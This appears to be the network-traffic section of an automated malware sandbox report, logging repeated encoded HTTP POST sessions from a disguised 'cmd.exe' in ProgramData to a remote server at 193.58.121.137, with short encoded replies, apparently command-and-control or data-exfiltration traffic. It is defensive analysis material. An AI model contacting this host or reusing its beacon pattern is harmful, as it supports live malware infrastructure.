                                                                                                                                  Data Ascii: %%6'3+0$\)*</:;"<)8*#!*T!?5Z*:#["X"92:.8?&-9Y?>R795>#,3-$7Y?=Z0!Q9'0)Y3<&X%&#"Z&2%/2(1(54_)92;"_* R1\Q


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  10192.168.2.449750193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:47.164484978 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:47:47.512861013 CET2560OUTData Raw: 5a 56 5c 5e 59 40 5a 5a 5a 5c 55 51 59 5b 54 56 56 5b 5d 49 50 5d 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZV\^Y@ZZZ\UQY[TVV[]IP]ZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+#^&>%:1Z(\+?V?$=&.*)0 -5&#Q<?'_!%Y)3
                                                                                                                                  Jan 3, 2025 20:47:47.854372978 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:47.984031916 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:47 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  11192.168.2.449752193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:48.121233940 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:47:48.492074013 CET2560OUTData Raw: 5a 55 5c 58 5c 44 5a 54 5a 5c 55 51 59 58 54 50 56 58 5d 44 50 52 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZU\X\DZTZ\UQYXTPVX]DPRZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%?03>%4&%4<[??%6*0?_.&547T?='_!%Y)?
                                                                                                                                  Jan 3, 2025 20:47:48.761467934 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:48.896807909 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:48 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V
                                                                                                                                  Jan 3, 2025 20:47:49.113426924 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:48 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  12192.168.2.449753193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:49.713507891 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:47:50.059931993 CET2560OUTData Raw: 5a 54 59 5e 5c 44 5f 52 5a 5c 55 51 59 58 54 57 56 51 5d 45 50 57 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZTY^\D_RZ\UQYXTWVQ]EPWZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%(#3."&*',4]+>#U('&%5S*34-&47R+-'_!%Y)?
                                                                                                                                  Jan 3, 2025 20:47:50.400473118 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:50.529957056 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:50 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  13192.168.2.449754193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:50.658536911 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:47:51.012890100 CET2560OUTData Raw: 5f 53 59 5f 59 42 5a 56 5a 5c 55 51 59 5b 54 50 56 5c 5d 41 50 50 5a 5f 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _SY_YBZVZ\UQY[TPV\]APPZ_Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&(V0&>>&4:1<#()7!&X)R*/Z:1#'(+'_!%Y)3
                                                                                                                                  Jan 3, 2025 20:47:51.311006069 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:51.445928097 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:51 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  14192.168.2.449755193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:52.086200953 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:47:52.435069084 CET2560OUTData Raw: 5f 54 59 59 59 47 5a 5b 5a 5c 55 51 59 59 54 50 56 50 5d 49 50 51 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _TYYYGZ[Z\UQYYTPVP]IPQZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&<#,0%19]2/<=#U+4"&-)W=+X9&""43W?'_!%Y)


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  15192.168.2.449756193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:52.598539114 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 1860
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:47:52.950612068 CET1860OUTData Raw: 5f 57 59 58 5c 47 5a 51 5a 5c 55 51 59 58 54 57 56 5b 5d 48 50 56 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _WYX\GZQZ\UQYXTWV[]HPVZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%@(3]'5%'%%<$[?.8<4*$.T*37Z.67'S('_!%Y)?
                                                                                                                                  Jan 3, 2025 20:47:53.307080030 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:53.443871021 CET380INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:53 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 152
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 09 1e 26 58 24 36 2c 57 27 28 0a 0b 30 04 29 0e 3c 12 20 1b 2e 08 24 59 36 03 2f 54 29 0d 01 05 3d 3c 24 11 35 59 21 0e 22 2f 3e 00 28 3a 23 5b 03 1d 21 06 35 32 21 06 27 29 29 5a 38 33 28 08 26 3d 3e 06 28 2e 03 53 23 58 22 11 35 07 3c 11 2f 1d 21 10 26 2c 2c 06 28 3e 22 5a 33 3f 21 51 00 10 3a 0d 27 33 25 58 24 02 22 5b 32 3e 26 03 27 35 3b 5a 35 3c 00 57 31 2b 2d 10 38 22 3c 1d 27 32 3b 09 21 0d 01 02 3e 5f 21 56 26 01 22 5f 2a 01 20 52 00 31 5c 51
                                                                                                                                  Data Ascii: &X$6,W'(0)< .$Y6/T)=<$5Y!"/>(:#[!52!'))Z83(&=>(.S#X"5</!&,,(>"Z3?!Q:'3%X$"[2>&'5;Z5<W1+-8"<'2;!>_!V&"_* R1\Q


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  16192.168.2.449758193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:52.728409052 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:47:53.075546980 CET2560OUTData Raw: 5a 55 5c 5b 59 43 5a 5a 5a 5c 55 51 59 5d 54 56 56 58 5d 42 50 50 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZU\[YCZZZ\UQY]TVVX]BPPZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%@(0+]$.Y%'9Y%X>-Q(B6W1>%T=3^.%=74 +'_!%Y)+
                                                                                                                                  Jan 3, 2025 20:47:53.381468058 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:53.524153948 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:53 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  17192.168.2.449759193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:53.666493893 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:47:54.016398907 CET2560OUTData Raw: 5f 5e 59 5f 5c 44 5a 55 5a 5c 55 51 59 56 54 50 56 5f 5d 48 50 5d 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _^Y_\DZUZ\UQYVTPV_]HP]ZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%?<3>2!Y1\+<)$&T$-))#-9X7V)-'_!%Y)
                                                                                                                                  Jan 3, 2025 20:47:54.301357031 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:54.428219080 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:54 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  18192.168.2.449760193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:54.770334959 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:47:55.122303963 CET2560OUTData Raw: 5f 50 59 5f 59 45 5f 52 5a 5c 55 51 59 57 54 55 56 5b 5d 44 50 5d 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _PY_YE_RZ\UQYWTUV[]DP]ZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%B( ,3.>%7)X&,0\+=?&U$.>3(96*#<('_!%Y)
                                                                                                                                  Jan 3, 2025 20:47:55.517940998 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:55.661448956 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:55 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  19192.168.2.449761193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:55.796092987 CET373OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Jan 3, 2025 20:47:56.153820038 CET2560OUTData Raw: 5f 51 59 59 59 40 5a 51 5a 5c 55 51 59 5c 54 52 56 5c 5d 40 50 50 5a 52 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _QYYY@ZQZ\UQY\TRV\]@PPZRZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%G(]&>1Y&79Y&,$[+>8?B"1-=W*0(.=\#Q#V+-'_!%Y)/
                                                                                                                                  Jan 3, 2025 20:47:56.444598913 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:56.575614929 CET151INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:56 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  20192.168.2.449763193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:56.715717077 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 2560
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:47:57.080581903 CET2560OUTData Raw: 5f 52 59 58 59 42 5a 5b 5a 5c 55 51 59 5c 54 5a 56 51 5d 42 50 50 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: _RYXYBZ[Z\UQY\TZVQ]BPPZ]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%?0'\3%2752,7+<$2>6>$.&>7'(-'_!%Y)/
                                                                                                                                  Jan 3, 2025 20:47:57.352978945 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:57.482217073 CET207INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:57 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Content-Length: 4
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 3b 56 5f 56
                                                                                                                                  Data Ascii: ;V_V


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  21192.168.2.449769193.58.121.137807548C:\ProgramData\SoftwareDistribution\cmd.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Jan 3, 2025 20:47:58.493887901 CET397OUTPOST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                  Host: 193.58.121.137
                                                                                                                                  Content-Length: 1860
                                                                                                                                  Expect: 100-continue
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Jan 3, 2025 20:47:58.841133118 CET1860OUTData Raw: 5a 52 5c 53 59 44 5a 52 5a 5c 55 51 59 58 54 50 56 50 5d 40 50 55 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56
                                                                                                                                  Data Ascii: ZR\SYDZRZ\UQYXTPVP]@PUZ]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%B+3;_3.!\25X2,?.7+B>$.)=#[.%7<)-'_!%Y)?
                                                                                                                                  Jan 3, 2025 20:47:59.229657888 CET25INHTTP/1.1 100 Continue
                                                                                                                                  Jan 3, 2025 20:47:59.360146999 CET380INHTTP/1.1 200 OK
                                                                                                                                  Date: Fri, 03 Jan 2025 19:47:59 GMT
                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Content-Length: 152
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Data Raw: 09 1e 25 00 33 26 23 08 24 5e 2f 16 27 2a 31 0b 28 3c 0a 1c 39 32 24 5b 22 04 3f 55 29 55 33 00 2a 01 3f 01 22 3c 35 08 36 2c 2e 01 2b 2a 23 5b 03 1d 21 02 36 31 3a 12 25 5f 31 10 2c 1e 20 43 24 2d 35 13 3c 00 21 18 20 3d 3e 1c 35 07 23 0e 38 33 22 05 24 12 27 5f 28 3d 0c 10 27 15 21 51 00 10 3a 09 24 30 3e 06 27 3f 26 13 32 03 3d 11 33 0b 20 02 22 12 0f 08 26 38 2a 00 2c 22 37 0f 32 22 2b 0b 35 0d 05 05 29 17 08 0c 25 01 22 5f 2a 01 20 52 00 31 5c 51
